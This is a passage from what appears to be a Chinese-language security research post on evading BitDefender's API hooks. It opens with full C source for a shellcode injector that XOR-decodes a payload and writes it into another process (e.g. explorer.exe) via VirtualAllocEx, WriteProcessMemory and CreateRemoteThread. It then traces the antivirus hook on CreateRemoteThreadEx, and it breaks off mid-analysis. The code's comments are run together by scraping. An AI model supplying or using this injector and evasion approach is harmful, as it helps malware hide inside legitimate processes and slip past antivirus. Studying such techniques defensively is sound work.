![a693fddaefb8f8f128aba9db8d10c9e6.png](https://img-blog.csdnimg.cn/img_convert/a693fddaefb8f8f128aba9db8d10c9e6.png)
#include // This code was written for researching purpose, you have to edit it before using it in real-world// This code will deocde your shellcode and write it directly to the memoryint main(int argc, char* argv[]) {
// Our Shellcodeunsigned char shellcode[] = "MyEncodedshellcode";// Check arguments counterif(argc != 2){
printf("[+] Usage : decoder.exe [PID]\n"); exit(0);}// The process id we want to inject our code to passed to the executable// Use GetCurrentProcessId() to inject the shellcode into original processint process_id = atoi(argv[1]);// Define the base_address variable which will save the allocated memory addressLPVOID base_address;// Retrive the process handle using OpenProcessHANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) {
printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) {
printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){
// Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){
// Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, NULL, 0x50002); } else {
printf("[+] Unable to allocate memory ..\n"); } } else {
printf("[-] Enable to retrieve process handle\n"); }}
编译该文件并运行来注入explorer.exe的shellcode后,将得到以下信息:
![f41615c1ec9bcf0209f87f489edabaf3.png](https://img-blog.csdnimg.cn/img_convert/f41615c1ec9bcf0209f87f489edabaf3.png)
注入的定制模块
从上图可以看出,可执行文件中加载一个名为atcuf64.dll的文件,并且该文件与BitDefender有关。 因此,研究人员开始从最可疑的“CreateRemoteThread ”开始,调试在shellcode注入中调用的主要win32APIs,反汇编结果如下所示。![11d6494400fbec79c3845750d37e8df5.png](https://img-blog.csdnimg.cn/img_convert/11d6494400fbec79c3845750d37e8df5.png)
CreateRemoteThread的反汇编代码
这里并没有可疑之处,但是从执行流程可以看出,接下来将使用CreateRemoteThreadEx API,因此对其进行反汇编,结果如下所示:![b95549d5d00a200094fb1cfc0041a599.png](https://img-blog.csdnimg.cn/img_convert/b95549d5d00a200094fb1cfc0041a599.png)
CreateRemoteThread Hooked
该结果并不寻常,可以看出在API的开头部分有一个JMP指令,如果跟踪执行流程,将看到下列情况: